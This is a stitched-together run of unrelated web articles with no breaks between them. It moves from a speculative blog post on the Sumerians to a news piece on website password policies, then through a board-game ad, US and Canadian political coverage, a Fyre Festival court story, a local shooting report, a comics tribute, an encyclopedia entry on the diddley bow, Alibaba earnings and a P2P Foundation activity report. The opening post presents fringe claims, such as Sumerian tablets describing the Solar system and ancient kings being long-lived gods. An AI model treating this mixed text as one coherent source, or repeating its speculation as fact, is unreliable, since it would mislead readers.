For a long time the cities, described in the Christian Bible, such as Babylon, Akkad, Erech, were considered to be mythical, because no one could prove their existence. But still all of them were found in the past 120 years. So we can safely assume that most of our contemporary knowledge can be subjected to doubt. Each day the history changes and it can be rewritten at any time.
So I'd like to share some interesting facts of our history with you to rekindle interest a little bit.
The Sumerians is the first thing I would like to recall. According to many versions they are considered to be the progenitors of modern civilization and everything that we see around us began with their occurrence. These people appeared from nowhere in southern Mesopotamia in the middle of the III-rd millennium, but until the middle of the 19th century no one even knew about them.
Meanwhile, the Sumerians have brought into the world the possibility of metal processing, agricultural implements, the wheel and potter's circle. The Sumerians were the first who invented writing. Later it became known as cuneiform. They were also the first who invented money, taxes, issued laws, conducted social reforms.
On the location of the Sumerian cities archaeologists have found thousands of texts that contain mathematical equations with geometric shapes and illustrations on astronomy. These tablets date back to 1700 B.C. In addition, they widely used phytotherapy, were good at anatomy and chemistry, pharmaceutics. Priests, which versed in astrology and the zodiac circle, created a calendar. That allowed the religious caste to skillfully manipulate the ordinary people. The Sumerian texts contain information about the origin, development and structure of the Solar system. These texts include the list and characteristics of planets. How could they get this knowledge? Where have they gone?
Moreover, there are amazing artifacts which tell about the life of the Sumerians. Here is one of them. This artifact reminds me personally one of the stones from the movie “The Fifth Element”. It is known as The Sumerian King List, which has given rise to great deal of controversy. This list was compiled in 1820 B.C. and written on a clay block. Archaeologists have discovered this manuscript during the excavations on the territory of present-day Iraq.
The document describes the creating of cities and dates of the king's reign from the beginning of the world in different cities of Mesopotamia, before the Flood and after it. The early list tells about eight kings who ruled in total of 241,200 years from the time when the royal power “descended from heaven” and to the time when a wave of “Flood” swept through the land, and once again, “the kingship was descended from heaven” after Flood.
Some kings were fictitious or even legendary, such as Ethan, Lugalbanda and Gilgamesh, and some of them had unimaginably long periods of government.
“After the kingship descended from heaven, the kingship was in Eridu. In Eridu, Alulim became king; he ruled for 28,800 years. Alalgar ruled for 36,000 years. Two kings; they ruled for 64,800 years.”
There are various explanations of these terms. There is a version that numbers for the Sumerians were relative values, which reflected the degree of power or the triumph of the importance of a particular reign. As well as years of lives, described in the Bible – depending on the saturation of life, contribution to the development of civilization. There was also a version which admitted that the early kings were really gods. They truly could live much longer than ordinary people.
I prefer to think that there is some truth in it. Everything that seems mystical and inexplicable to us today, tomorrow will be undoubted and indisputable.
Share this: Twitter
Google
Tumblr
Reddit
Facebook
LinkedIn
Pinterest
More
Print
Pocket
Like this: Like Loading...
Related
One might guess that heavily trafficked Web sites — especially those that provide access to users' financial information — would have requirements for strong passwords. But it turns out that password policies of many such sites are among the most relaxed. These sites don't publicly discuss security breaches, but Mr. Herley said it “isn't plausible” that these sites would use such policies if their users weren't adequately protected from attacks by those who do not know the password.
Mr. Herley, working with Dinei Florêncio, also at Microsoft Research, looked at the password policies of 75 Web sites. At the Symposium on Usable Privacy and Security, held in July in Redmond, Wash., they reported that the sites that allowed relatively weak passwords were busy commercial destinations, including PayPal, Amazon.com and Fidelity Investments. The sites that insisted on very complex passwords were mostly government and university sites. What accounts for the difference? They suggest that “when the voices that advocate for usability are absent or weak, security measures become needlessly restrictive.”
Photo
Donald A. Norman, a co-founder of the Nielsen Norman Group, a design consulting firm in Fremont, Calif., makes a similar case. In “When Security Gets in the Way,” an essay published last year, he noted the password rules of Northwestern University, where he then taught. It was a daunting list of 15 requirements. He said unreasonable rules can end up rendering a system less secure: users end up writing down passwords and storing them in places that can be readily discovered.
“These requirements keep out the good guys without deterring the bad guys,” he said.
Northwestern has reduced its password requirements to eight, but they still constitute a challenging maze. For example, the password can't have more than four sequential characters from the previous seven passwords, and a new password is required every 120 days.
Newsletter Sign Up Continue reading the main story Please verify you're not a robot by clicking the box. Invalid email address. Please re-enter. You must select a newsletter to subscribe to. Sign Up You will receive emails containing news content , updates and promotions from The New York Times. You may opt out at any time. You agree to receive occasional updates and special offers for The New York Times's products and services. Thank you for subscribing. An error has occurred. Please try again later. View all New York Times newsletters.
By contrast, Amazon has only one requirement: that the password be at least six characters. That's it. And hold on to it as long as you like.
A short password wouldn't work well if an attacker could try every possible combination in quick succession. But as Mr. Herley and Mr. Florêncio note, commercial sites can block “brute-force attacks” by locking an account after a given number of failed log-in attempts. “If an account is locked for 24 hours after three unsuccessful attempts,” they write, “a six-digit PIN can withstand 100 years of sustained attack.”
Roger A. Safian, a senior data security analyst at Northwestern, says that unlike Amazon, the university is unfortunately vulnerable to brute-force attacks in that it doesn't lock out accounts after failed log-ins. The reason, he says, is that anyone could use a lockout policy to try logging in to a victim's account, “knowing that you won't succeed, but also knowing that the victim won't be able to use the account, either.” (Such thoughts may occur to a student facing an unwelcome exam, who could block a professor from preparations.)
VERY short passwords, taken directly from the dictionary, would be permitted in a password system that Mr. Herley and Stuart Schechter at Microsoft Research developed with Michael Mitzenmacher at Harvard.
At the Usenix Workshop on Hot Topics in Security conference, held last month in Washington, the three suggested that Web sites with tens or hundreds of millions of users, could let users choose any password they liked — as long as only a tiny percentage selected the same one. That would render a list of most often used passwords useless: by limiting a single password to, say, 100 users among 10 million, the odds of an attacker getting lucky on one attempt per account are astronomically long, Mr. Herley explained in a conversation last month.
Advertisement Continue reading the main story
Mr. Herley said the proposed system hadn't been tested and that users might become frustrated in trying to select a password that was no longer available. But he said he believed an anything-is-permitted password system would be welcomed by users sick of being told, “Eat your broccoli; a strong password is good for security.”
We've been celebrating 420 day with products like the Pot Leaf Ice Cube Tray and the Marijuana T-Shirt. Here's another: the Stoner City Board Game. The stereotype is that weed smokers lay around on the couch half asleep and not socializing with each other. Put that to rest by breaking out this game from Stonerware at your next gathering. It should turn the excitement up a notch giving you an enjoyable party atmosphere, because according to the Amazon.com reviews, “This game is SO much fun.”
Stoner City is the game of owners and stoners that makes you the head of your very own budding business. Buy, sell, grow, and trade all while trying to keep up with the growing demand for your…uh product. But it's not all just dollars and sinsemilla. Being kicked out of your parent's basement, getting busted by the man or going to rehab are just some of the hassles you'll deal with as you make your way through the world of high finance. So, roll those bones and get ready to smoke the competition, because in STONER CITY – the player with the most weed is the winner indeed!
Buy the Stoner City Board Game at Amazon.com, and have some fun with your fellow ents.
Related Deals: Amazon Coupons
Columnist and author Pat Buchanan predicted that President Barack Obama would “have a hellish firestorm on his hands” if he moved forward with plans to grant amnesty to illegal immigrants through an executive order on this weekend's “The McLaughlin Group.”
“I'll tell you, he's going to have a hellish firestorm on his hands if, he in December, which my guess would be he would likely to do, he grants an executive amnesty. When George Bush took all of that trouble to go to the Congress of the United States to fight a great battle, saying in effect, ‘Congress and the president decide this together,' he does that unilaterally, and I think he's going to permanently help his party and [damage] it.”
Mort Zuckerman, U.S. News and World Report chairman and editor-in-chief and publisher of The New York Daily News, added “I think he [Obama] is doing it almost entirely from a political perspective. I mean, whatever he does, at least on this kind of issue, is not based on any great moral principle.” And “I would tell him to hold off for a while, because otherwise you're going to create a real conflict within the United States public.”
Follow Ian Hanchett on Twitter @IanHanchett
He appeared in court in a light blue T-shirt and black jeans and said nothing except when answering brief questions from the judge about whether he understood the process. His eyes appeared to be watering faintly as he looked toward his parents, who sat in the back of the courtroom, which was otherwise occupied by only court personnel, two F.B.I. agents and a handful of reporters.
The question of how much money Mr. McFarland still has been central to the hearing, whose purpose was to set bail and to inform Mr. McFarland of his rights.
After the collapse of the Fyre Festival in late April, when young music fans who had paid for a luxurious musical getaway and instead arrived to find a shantytown of tents on a darkened beach, Mr. McFarland hired a legal team to defend him against more than a dozen civil lawsuits.
He also retained a crisis public relations firm to manage a wave of negative media coverage.
At the hearing, Ms. Shroff said Mr. McFarland's previous lawyers had not been paid enough to continue to represent him.
Public defenders are reserved for defendants with limited assets, and the government will often challenge whether those who apply for them really qualify, as they did in the case of Joaquín Guzmán Loera, the Mexican drug lord known as El Chapo who is currently incarcerated in New York.
Justin Trudeau, The 'Shiny Pony' Who Became Canada's Prime Minister
Enlarge this image toggle caption Nicholas Kamm/AFP/Getty Images Nicholas Kamm/AFP/Getty Images
In 2012, Justin Trudeau, then a young member of the Canadian Parliament, stepped into a boxing ring at a charity event in Ottawa. His opponent, a heavily tattooed and much beefier senator named Patrick Brazeau, was favored to win by 3-to-1 odds.
Trudeau, wearing red boxing shorts and sporting a large tattoo of the Earth encircled by a raven on his left shoulder, took as many hits from the announcer as he did from his opponent. Conservative broadcaster Ezra Levant mocked Trudeau as "the Shiny Pony," said his daughter could skip rope better and predicted the fight would last one round.
But the Shiny Pony surprised everyone: Trudeau won in the third round.
That boxing match could very well have been a preview of Canada's elections last October. Trudeau and his Liberal Party lagged in third place at the start of the short campaign. But once again, his opponents underestimated him. Trudeau won a decisive victory against Conservative incumbent Stephen Harper.
YouTube
"Have faith in your fellow citizens, my friends," Trudeau said in his victory speech, delivering his signature "Sunny Ways" message. "They are kind and generous, they are open-minded and optimistic." At heart, he said, "A Canadian is a Canadian is a Canadian."
Tall, athletic and with matinee idol looks, Trudeau energized the Canadian elections, normally dull affairs. But his appeal is more than skin-deep, says Althia Raj, Ottawa bureau chief for the Huffington Post.
Enlarge this image toggle caption AP AP
"I think there's more to it than looks," she says. "I think there's the sense he seems authentic." Trudeau captured the mood for change, especially among young and cynical Canadians.
"They feel like he's a little bit like one of them," she says. "He embraces social media, he's present, he's kind of cheeky, he's a Star Wars nerd. And they feel connected to him."
Many Canadians also feel a natural connection to Trudeau through his father, Pierre Elliott Trudeau, who served as prime minister from 1968 to 1979 and then again from 1980 to 1984. The elder Trudeau was a charismatic but divisive leader who drove sleek, foreign sports cars, dated celebrities and married a much younger Margaret Sinclair — Justin's mother — a woman 28 years his junior. He inspired a phenomenon dubbed "Trudeaumania."
Many Canadians remember this colorful era fondly, Raj says, and have an affinity for Justin Trudeau.
"A lot of people remember the day he was born; they remember him growing up; they remember his father; they remember his parents' nasty divorce. They have a feeling they know him," she says. There is a sense, she says, that Trudeau represents "our first dynasty."
toggle caption Boris Spremo/Toronto Star via Getty Images
Trudeau is living up to his father's charismatic image. Vogue has called him "dashing" and ran pictures of him and his wife, Sophie Gregoire Trudeau, in a passionate embrace. In the New York Times, an article suggested the new prime minister has helped make Canada hip.
He earned the Twitter hashtag #hottie at an international forum and poses for selfies with the likes of Bono and Kevin Spacey — and just about anybody else who wants a picture with him.
This has led critics like Stephen Taylor, former director of the National Citizens Coalition, a conservative lobbying group, to say Trudeau is all show and no substance.
"I don't know if Justin Trudeau would be anywhere today if his name was Justin Jones," he says. "I think the prime minister risks a bit of overexposure and accusations of being a bit too flashy, because we're facing serious economic troubles in Canada in the future."
Trudeau's immediate test will come March 22, when he presents his government's first budget. Canada's deficit is projected to be $18.4 billion for 2016-2017, far more than what Trudeau's Liberal Party had been forecasting.
Some Canadians are just deeply uncomfortable with Trudeau's self-promotion and with having a celebrity for a prime minister, says Stephen Marche, a Toronto-based author and Esquire magazine columnist. He says Trudeau is very good at controlling his image and building a brand, which he uses as a foreign policy tool to help shape Canada's image in the world.
"If we want to spread our values, if we want to have an agenda globally, we're not going to do it by buying some military planes," Marche says. "We're going to do it by being this shining example."
Marche points to Trudeau's most visible success so far, his decision to resettle 25,000 Syrian refugees in Canada within four months of taking office. Trudeau says he will raise his two sons as feminists. Half his Cabinet members are women and his administration is a portrait of diversity, including Muslim and Sikh Cabinet ministers.
Enlarge this image toggle caption Aaron Favila/AP Aaron Favila/AP
L. Ian MacDonald, editor and publisher of Policy, a bimonthly political magazine, notes that many in the Cabinet are rookies, including the finance and environment ministers. He says mistakes are inevitable.
But "Mr. Trudeau has permission slips from the voters to do a lot of things," he says. And MacDonald is sure that "if he comes up short that they'll be in a forgiving mood, at least in the beginning."
But the honeymoon period is limited. MacDonald's advice to Trudeau: Stop with the selfies already, and start governing.
For marketers, Twitter has been a dream come true. It's an open platform growing at a phenomenal rate. This combination can allow a single tweet to be seen by thousands of potential customers. But as Twitter continues its mainstream ascent, it has been targeted by spammers and scammers, something that doesn't help legitimate marketers or users at all.
Yet despite its spam woes, Twitter has somehow avoided an overflow of content from one of the Internet's biggest industries: porn. Well, until recently that is. An interesting article in MediaPost describes both marketers and Twitter users noticing an increase in pr0n-related spam, and they are not liking it. The issue makes us wonder: should Twitter stamp out pornography; and how should they go about it?
Twitter Users' Feedback on Pornography
The MediaPost piece essentially quotes some of Twitter's active marketers on the issue of Twitter and porn. What they have to say, though, is not pretty at all. While you can guess how users react in the piece, Ben Smith of MerchantCircle sums up the problem best:
MerchantCircle has begun to offer a portfolio of local city-specific coupons via Twitter feeds. "As we have found with any new communication form, pornography and other types of issues creep in," says Ben Smith, MerchantCircle CEO. "The problem with this type of activity is that it undermines the trust in the communication channel, which will have a disastrous effect on the channel."
Has pornography taken over Twitter? No, not by a longshot. Is it a growing problem? Absolutely. Things like Twitter porn trojans make it clear that Twitter is not impervious to porn-related spam and malware.
What Do Twitter's Terms of Service Say?
We took a look at the Twitter Terms of Service, which governs user interactions with the Twitter platform. While it mentions that they can "remove Content and accounts containing Content that we determine ... are obscene or otherwise objectionable," it makes no specific reference to pornography.
Compare this to the terms of service of other social media companies, such as the Facebook Statement of Rights and Responsibilities, which specifically states the following:
6. You will not post content that is hateful, threatening, pornographic, or that contains nudity or graphic or gratuitous violence.
Does this mean that Twitter doesn't care about porn? Absolutely not - Twitter has addressed pornography spam in the past and we doubt that it would let the Internet's underground industry tarnish its strong reputation.
And yet Twitter needs to monitor the situation. Porn should not be acceptable on Twitter, especially an open platform that millions of companies and users use for business and marketing every single day. It may be a relatively small issue now, but it will grow more prevalent unless they put a stop to the problem early. It's easy to forget just how much of the Internet is entirely porn.
First though, Twitter needs to build a search spam solution ASAP. It's all part of the same core problem that Twitter will need to address.
UPDATE: EPD: "Shooting ruled accidental. No arrests at this time." Copyright 2019 Nexstar Broadcasting, Inc. All rights reserved. This material may not be published, broadcast, rewritten, or redistributed. Video
RELATED HEADLINES Reports of shots fired in Elmira confirmed
ELMIRA, N.Y. (18 NEWS) - UPDATE (2:30 a.m.) : Elmira Police said a shooting Sunday on the city's Southside has been ruled accidental. No arrests at this time and details of the investigation are expected to come out later Monday, according to EPD.
----------------------------------------------------------------------------------------
UPDATE (11:30 p.m.) : Police are currently investigating a shooting that took place around 6:30 p.m. at 383 South Main Street in the City of Elmira.
Elmira Police officials said an adult male and a 13-year-old male both suffered single gunshot wounds. Both were treated and released from a local hospital.
Officials said they found the injured males while they were conducting a follow-up investigation for a previous shooting incident that occurred at the same location on Thursday.
South Main Street from Mt. Zoar to Boardman is closed. Mt. Zoar from Pennsylvania Ave to Fulton is closed. The streets are expected to re-open by 12 a.m. Monday.
Anyone with information is asked to contact the Elmira Police Department at 737-5626 or leave an anonymous message on the tip line at 271-4258.
--------------------------------------------------------------------------------------------
ORIGINAL:
Several law enforcement agencies have been on scene at the intersection of South Main and Mt. Zoar for most of Sunday evening.
Officials were called to the scene around 6:45 p.m. When an 18 News reporter arrived on scene they saw an ambulance, as well as a fire truck and officers from both the Elmira Police department and the Chemung County Sheriff's Department.
Officers were securing the surrounding area, asking bystanders to clear the area between Boardman Street and Pennsylvania Avenue.
On several occasions officers were seen with their weapons drawn, they appeared to be directing them towards a house on the corner of South Main and Mt. Zoar. Authorities have not released any information on the situation yet, but they are still on scene collecting evidence.
Stay with 18 News for updates as this story continues to development.
Scott McCloud was born on this day in 1960, as Scott McLeod. (Like all great self-made iconoclasts, he changed his name.) Cartoonist, scholar, orator, inventor, and champion, Scott McCloud is one of the most important creators of his era, and perhaps the Ben Franklin of comics.
McCloud has been making comics since his high school days. Growing up in Lexington, Massachusetts, he was good friends with another comics lover, Kurt Busiek , and they collaborated on a few stories together, including what they've each essentially described as a sixty-page fight scene between Marvel characters called The Battle of Lexington . Around the same time, McCloud contributed illustrations to magazines like Amazing Heroes and The Comics Journal , and eventually each made his own way into the industry.
For McCloud, the big bang was Zot. While the trend in superhero comics at the time was toward grit and violence, in 1984 McCloud went against the grain of the industry with a bright sci-adventure heavily influenced by Osamu Tezuka 's Astro Boy , and reminiscent of the pure, mad joy of the Golden Age.
But McCloud has the rare ability to look back while moving forward, and throughout the entirety of Zot, McCloud displayed a progressive yen, honing his craft in leaps and bounds pushing the series into more emotionally mature territory. After an absence of a few years, the series returned for 26 further black-and-white installments, and that's where McCloud really digs in. Zot earned McCloud the first of his many awards, and it remains a must-read.
In the late 80s, McCloud wrote the first draft of a Creator's Bill of Rights, arguing for creator ownership and control as the industry standard, with signatories that included Steve Bissette , Dave Sim , and TMNT creators Kevin Eastman and Peter Laird . Although the document had no lasting effect on the industry, it was at least important symbolically, and showed that McCloud's love for the industry went well beyond the page.
In 1990 McCloud created the 24-Hour Comic. What began as a dare with Bissette to write and draw a twenty-four page comic in a single day became a game, an anthology, a challenge to the industry, and a gauntlet that thousands of young creators are still running. October 10th has since become worldwide 24-Hour Comics day, with Red Bull-fueled events and drawing parties taking place all over the globe.
His biggest contribution to the medium is obviously Understanding Comics . A grammar for the language of sequential art, Understanding Comics is generally regarded as the one book that every would-be creator must read . A brilliantly incisive breakdown of the mechanisms that drive graphic sequential storytelling, Understanding Comics introduced the subtlety and grace of "the invisible art" to a wider audience.
A crossover success that's found its way into endless academic programs and become a dog-eared favorite of libraries, Understanding Comics is intelligent without being stiff; and academic while still being playful and immensely readable. An energetic dissection of movement, space, time, iconography, and design, Understanding Comics raises the comics IQ of the reader with its immaculately-drawn instructional storytelling.
In his follow-ups, Reinventing Comics and Making Comics, McCloud went on to advocate for new forms of comics, including web and digital, and delved even deeper into the workings of the medium. He also performed numerous speaking tours, including his popular lecture "The Visual Magic of Comics."
McCloud has probably produced fewer pages of actual comics than many of his contemporaries, but they've had far more impact. His other accomplishments include being an early adopter of micro-payments; writing one of the best Superman stories of a doomed era, Superman: Strength ; and introducing Google Chrome to the world via the web browser's instructional comic --- but don't hold that against him. In 2015 he released a 500-page graphic novel called The Sculptor that many rate among the best works of the year, and among the best works of his career. He's spent that career one step in front of the crowd, and one page ahead of the industry. Happy birthday, Scott McCloud!
Electric Diddley Bow
The diddley bow is a single-stringed American instrument which influenced the development of the blues sound. It consists of a single string of baling wire tensioned between two nails on a board over a glass bottle, which is used both as a bridge and as a means to magnify the instrument's sound.
It was traditionally considered a starter or children's instrument in the Deep South, especially in the African American community, and is rarely heard outside the rural South, but it may have been influenced to some degree by West African instruments.[1] Other nicknames for this instrument include "jitterbug" or "one-string", while an ethnomusicologist would formally call it a "monochord zither".
Origins [ edit ]
The diddley bow derives from instruments used in West Africa. There, they were often played by children, one beating the string with sticks and the other changing the pitch by moving a slide up and down. The instrument was then developed as a children's toy by slaves in the United States. They were first documented in the rural South by researchers in the 1930s.[2][3]
Construction [ edit ]
The diddley bow is typically homemade, consisting usually of a wooden board and a single wire string stretched between two screws, and played by plucking while varying the pitch with a metal or glass slide held in the other hand. A glass bottle is usually used as the bridge, which helps amplify the sound. The diddley bow was traditionally considered an "entry-level" instrument, normally played by adolescent boys, who then graduate to a "normal" guitar if they show promise on the diddley bow. However currently, the diddley bow is also played by professional players as a solo as well as an accompaniment instrument.
The diddley bow is significant to blues music in that many blues guitarists got their start playing it as children, as well as the fact that, like the slide guitar, it is played with a slide. However, because it was considered a children's instrument, few musicians continued to play the diddley bow once they reached adulthood. The diddley bow is therefore not well represented in recordings.
Notable users [ edit ]
One notable performer of the instrument was the Mississippi blues musician Lonnie Pitchford, who used to demonstrate the instrument by stretching a wire between two nails hammered into the wood of a vertical beam making up part of the front porch of his home. Pitchford's headstone, placed on his grave in 2000 by the Mt. Zion Memorial Fund, is actually designed with a playable diddley bow on the side as requested by Pitchford's family.
Other notable traditional players include Lewis Dotson, Glen Faulkner, Jessie Mae Hemphill, Compton Jones, Eddie "One String" Jones, Napoleon Strickland, Moses Williams, James "Super Chikan" Johnson and One String Sam (Sam Wilson). Willie Joe Duncan was also notable for his work with a large electrified diddley bow he called a Unitar. Some members of the Motown band "The Funk Brothers" are said to have learned to play the guitar on the diddley bow. Buddy Guy learned to play music on a two-string homemade diddley bow before getting his first guitar (a Harmony acoustic).
Recent performers who use similar instruments include New York City-based jazz pianist Cooper-Moore, American bluesman Seasick Steve, Samm Bennett, Danny Kroha, One String Willie, and blind musician Velcro Lewis. Jack White makes one at the beginning of the movie It Might Get Loud, then after playing it quips "Who says you need to buy a guitar?". Seasick Steve recorded a tribute song to his diddley bow on his song "Diddley Bo" from his 2009 album, Man From Another Time. [4]
Filmography [ edit ]
American Patchwork: Songs and Stories of America , part 3: "The Land Where the Blues Began" (1990). Written, directed, and produced by Alan Lomax; developed by the Association for Cultural Equity at Columbia University and Hunter College. North Carolina Public TV; A Dibb Direction production for Channel Four. [5]
, part 3: "The Land Where the Blues Began" (1990). Written, directed, and produced by Alan Lomax; developed by the Association for Cultural Equity at Columbia University and Hunter College. North Carolina Public TV; A Dibb Direction production for Channel Four. It Might Get Loud, a 2008 documentary about the careers and influences of prominent rock guitarists, features Jack White building a diddley bow from scratch and playing a tune on it.
Discography [ edit ]
Louis Dotson - "Sitting on Top of the World" on Bothered All the Time , Southern Culture SC 1703 [6]
, Southern Culture SC 1703 Willie Joe (Duncan) and His Unitar – The track "Unitar Rock," is available on Teen Beat Vol 4. , Ace CDCHD 655. [7] "Twitchy" and "Cherokee Dance" are available on The Specialty Story , Specialty 5SPCD-4412-2. [8]
, Ace CDCHD 655. "Twitchy" and "Cherokee Dance" are available on , Specialty 5SPCD-4412-2. Glen Faulkner – "Cotton Pickin' Blues," "Louisiana Blues," "Glory, Glory, Hallelujah," "Get Right Church And Lets Go Home," on The Spirit Lives On: Deep South Country Blues and Spirituals in the 1990s , [9] Hot Fox HF-CD-005 (German CD, now out of print).
, Hot Fox HF-CD-005 (German CD, now out of print). Jessie Mae Hemphill – two tracks (one accompanied by Compton Jones) on Heritage of the Blues: Shake It, Baby , HighTone HCD 8156. [10] Two tracks (accompanied by Compton Jones and Glen Faulkner) on Get Right Blues , Inside Sounds ISC-0519. [11]
, HighTone HCD 8156. Two tracks (accompanied by Compton Jones and Glen Faulkner) on , Inside Sounds ISC-0519. Compton Jones – One track, "Shake 'Em On Down," on Afro-American Folk Music from Tate and Panola Counties, Mississippi , Rounder 1515 (CD). [12] With booklet notes by diddley bow scholar, Dr. David Evans. [13]
, Rounder 1515 (CD). With booklet notes by diddley bow scholar, Dr. David Evans. Eddie "One String" Jones – One String Blues , Takoma Records CDTAK 1023. [14] Nine tracks, the first one an interview of Eddie Jones where he tells how he built his instrument. The booklet notes include a drawing and some photographs of his instrument and of him playing.
, Takoma Records CDTAK 1023. Nine tracks, the first one an interview of Eddie Jones where he tells how he built his instrument. The booklet notes include a drawing and some photographs of his instrument and of him playing. The Oven's On 2007 by Velcro Lewis and His 100 Proof Band. [15]
2007 by Velcro Lewis and His 100 Proof Band. The Bronze Age 2009 by the Velcro Lewis Group.
2009 by the Velcro Lewis Group. The Almanac of Bad Luck 2009 by Tijuana Hercules. [16]
2009 by Tijuana Hercules. Lonnie Pitchford – Pitchford was another diddley bow master. He can be heard on four tracks on National Downhome Blues Festival Volume One , Southland SCD-21, "Train Coming Around the Bend," "My Babe," "Mary Had a Little Lamb" and "One-String Boogie." Two tracks on All Around Man , Rooster R2629; [17] "Real Rock Music: Crawlin' Kingsnake" and "My Babe." One track on Living Country Blues , Evidence ECD 26105-2 ("Boogie Chillen"). Also, another "One-String Boogie," and "My Baby Walked Away" on American Folk Blues Festival '83 ; "Johnny Stole An Apple," Living Country Blues USA - Volume 7: Afro-American Blues Roots ; "My Baby Walked Away" on Living Country Blues USA - Volume 9: Mississippi Moan and (yet another) "One String Boogie" on Living Country Blues USA - Volume 10: Country Boogie
, Southland SCD-21, "Train Coming Around the Bend," "My Babe," "Mary Had a Little Lamb" and "One-String Boogie." Two tracks on , Rooster R2629; "Real Rock Music: Crawlin' Kingsnake" and "My Babe." One track on , Evidence ECD 26105-2 ("Boogie Chillen"). Also, another "One-String Boogie," and "My Baby Walked Away" on ; "Johnny Stole An Apple," ; "My Baby Walked Away" on and (yet another) "One String Boogie" on Napoleon Strickland – One track, "Key to the Blues," on Bottleneck Blues , Testament 5021 (CD). [18] (This same cut also appears on the CD Africa and the Blues ).
, Testament 5021 (CD). (This same cut also appears on the CD ). One String Willie - Seven tracks on A Store-Bought Guitar Just Won't Do, 10 tracks on You Gotta Hit the String Right to Make the Music Swing . [19]
10 tracks on . Moses Williams – four tracks on a double-LP anthology of Florida blues produced by the Florida Folklife Program; Drop on Down In Florida , Florida Folklife LP 102-103. [20] This LP is long out of print, but a free CD from the Florida Folklife Collection from the Florida Folklife Program presents a cut of Williams playing and singing "Which Way Did My Baby Go?"
, Florida Folklife LP 102-103. This LP is long out of print, but a free CD from the Florida Folklife Collection from the Florida Folklife Program presents a cut of Williams playing and singing "Which Way Did My Baby Go?" One String Sam – Two cuts ("I Need $100" and "I Got to Go") from the 1973 Ann Arbor Blues and Jazz Festival [21] on Motor City Blues / Please Mr. Foreman , [22] Schoolkids' Records, SKR2101-2. Two tracks on Rural Blues Vol 1 (1934-1956) , Document Records B000000J8B ("I Need $100" (studio version) and "My Baby Ooh"). [23]
on , Schoolkids' Records, SKR2101-2. Two tracks on , Document Records B000000J8B ("I Need $100" (studio version) and "My Baby Ooh"). White Magick Summer 2010 by the Velcro Lewis Group.[24]
Similar instruments [ edit ]
See also [ edit ]
Looking for news you can trust?
Subscribe to our free newsletters.
“I'm going to be the nominee.” —Newt Gingrich, December 1, 2011.
With Rick Santorum's double win in the Deep South states of Alabama and Mississippi (Mitt Romney placed third in both), the upstart ex-senator from Pennsylvania has undeniably claimed the throne as the non–Romney in the race. As Romney's camp keeps pointing out, the math remains on Romney's side. But these triumphs for the anti-contraception candidate will ensure that the GOP slog continues on, with Santorum jabbing and Romney bleeding. They also show that Newt Gingrich's campaign is dead—whether Gingrich knows it or not. At his not-such-a-concession speech on Tuesday night, he said the nation needs “a visionary leader” (meaning him), bashed the media for perpetuating the Romney-is-inevitable line, and vowed “we will continue to run a people's campaign.” (There was no shout-out to casino magnate Sheldon Adelson, who is keeping his campaign alive by funneling millions to the pro-Gingrich super-PAC.)
But if he's not whistling a victory tune in Dixie, he won't be doing so anyplace else. He can stay in the race—and utter increasingly extreme remarks in a desperate attempt to gain attention—but it's not premature to mark the end of Gingrich 2012. The only remaining question is how long he'll fight on as a zombie. (Romney might even encourage Gingrich to stay in the contest to prevent Santorum from consolidating the anti-Romney vote.) So here's a not-that-gauzy look back at a campaign that failed to rescue the United States at its darkest hour:
What'd we miss? Leave your favorite memories in the comments.
Chinese e-commerce giant Alibaba has blown away earnings expectations in the quarter ending September 30. Revenues increased 55 percent to 34.29 billion yuan ($5 billion), more than Amazon and eBay combined.
Read more
“We reported robust revenue growth of 55 percent this quarter, with strong growth in each of our four reporting segments,” said Maggie Wu, Chief Financial Officer of Alibaba Group.
“Our highly profitable and cash flow generative core commerce business enables us to invest in our future growth areas of cloud computing, digital media and entertainment and innovation initiatives. We expect each of these businesses to drive long-term value for both our customers and shareholders,” she said.
Alibaba's revenue of 34.29 billion yuan (about $5 billion) in the three months through September beat the average estimate of 33.9 billion yuan from 24 analysts polled by Thomson Reuters.
Revenue from the company's core e-commerce business grew 41 percent over the year before to 28.49 billion yuan ($4.2 billion), driven by sales in China.
Net income slid to 7.1 billion yuan ($1.05 billion) from 22.7 billion yuan ($3.35 billion). Alibaba pegged the fall on a large one-time item.
"Beyond the strong performance of our core commerce business, we are pleased with the continued rapid growth of our cloud computing business," said Daniel Zhang, CEO of Alibaba Group.
Alibaba's media and digital entertainment business, which was consolidated under a new entity on Monday, saw revenues rise 302 percent year on year, mostly due to the consolidation of Youku Tudou, the local alternative to YouTube, which is blocked in China.
The company's report comes just days before China's Singles' Day on November 11, the world's biggest online shopping event, which is 10 times bigger than US Cyber Monday. Last year, Alibaba earned a world record breaking 91.2 billion yuan ($14.32 billion) during the day.
This overview is meant to be for the P2P Foundation as a network but this first part focuses on my own activities, which is the aspect I know best.
A second part should mention our network's participation in the P2P Value research project, the activities of the P2P Lab in Greece, the work of Guerilla Translation, and more.
My two strategic priorities for 2014 were the following:
* to contribute to the convergence between the open/p2p modes of production, and the cooperative/social/solidarity economy mode of production, and their respective social movements;
* to continue the work around a commons transition, following the experience in Ecuador with the floksociety.org project
In 2014, I continued to work on the convergence of the open/commons and cooperative movements, and I believe we made really substantial progress on this.
This convergence was prepared in late 2013 with my participation as attendee, speaker and scientific adviser to the Rencontre du Mont Blancs meeting 7-8 November 2014. This is a french network for the Social and Solidarity Economy. Following this event, we continued our conversations within that network, and met with the Frederic Sultan, Nicole Alix, and J-M Bancel, and others, to continue working at the institutional level. This will likely culminate in workshops in the spring and fall of 2015.
A separate line of communication and dialogue went through the english cooperative network, with members such as Pat Conaty, Robin Murray, Ed Mayo and Canadians like Margie Mendell, Mike Lewis, John Restakis. This network is now in alignment for this convergence. One of the highlights of 2014 was the ability to work very closely with John Restakis and many of his policy papers for the Ecuadorian FLOK project, also reflect this convergence. John is a great cooperative thinker and as he is influenced by p2p/commons thinking so am I influenced by his ideas on the Cooperative Commonwealth (also beautifully expressed by Pat Conaty). The dialogue with and within this network culminated in the open cooperativism deep dive in September in Berlin, which I co-organized with David Bollier, and in the subsequent 3-day ‘movement of movement convergence' in Meisse, also co-organized with David Bollier. It was also the theme of a very well diffused lecture during the Degrowth conference, in which Silke Helfrich was an active co-organizer for the material on the commons. Finally, we organized a three day collaborative convergence festival, organized by the P2P Foundation and myself with the assistance of Kevin Flanagan and the participation of John Restakis, in the Create green fablab at the Cloughjordan ecovillage in Ireland, which attracted many Irish nationals, especially young people. I was really very enthusiastic to see this green fab lab at work. Imagine in the middle of green Ireland, several dozens of smart and committed people!
Separate from the general dialogue and movement convergence, we also paid close attention to the development of systemic proposals, which can co-create an eco-system in which the open, cooperative and ‘sustainability' aspects can co-exist.
